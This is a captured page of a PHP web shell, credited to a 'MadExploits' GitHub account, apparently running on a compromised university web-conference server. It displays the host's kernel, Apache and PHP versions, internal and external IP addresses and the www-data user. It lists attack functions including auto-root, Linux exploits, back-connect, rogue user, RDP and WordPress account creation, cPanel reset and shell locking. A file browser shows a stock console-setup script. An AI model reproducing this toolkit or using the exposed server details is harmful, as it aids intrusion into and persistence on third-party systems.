Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.220.222.188
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
console-setup /
[ HOME SHELL ]
Name
Size
Permission
Action
console-setup.sh
920
B
-rwxr-xr-x
keyboard-setup.sh
390
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : console-setup.sh
#!/bin/sh do_configure=no case "`uname 2>/dev/null`" in *FreeBSD*) do_configure=yes ;; *) # assuming Linux with udev # Skip only the first time (i.e. when the system boots) [ ! -f /run/console-setup/boot_completed ] || do_configure=yes mkdir -p /run/console-setup > /run/console-setup/boot_completed [ /etc/console-setup/cached_setup_terminal.sh \ -nt /etc/default/keyboard ] || do_configure=yes [ /etc/console-setup/cached_setup_terminal.sh \ -nt /etc/default/console-setup ] || do_configure=yes ;; esac if [ "$do_configure" = no ]; then : else if [ -f /etc/default/locale ]; then # In order to permit auto-detection of the charmap when # console-setup-mini operates without configuration file. . /etc/default/locale export LANG fi setupcon --save fi
Close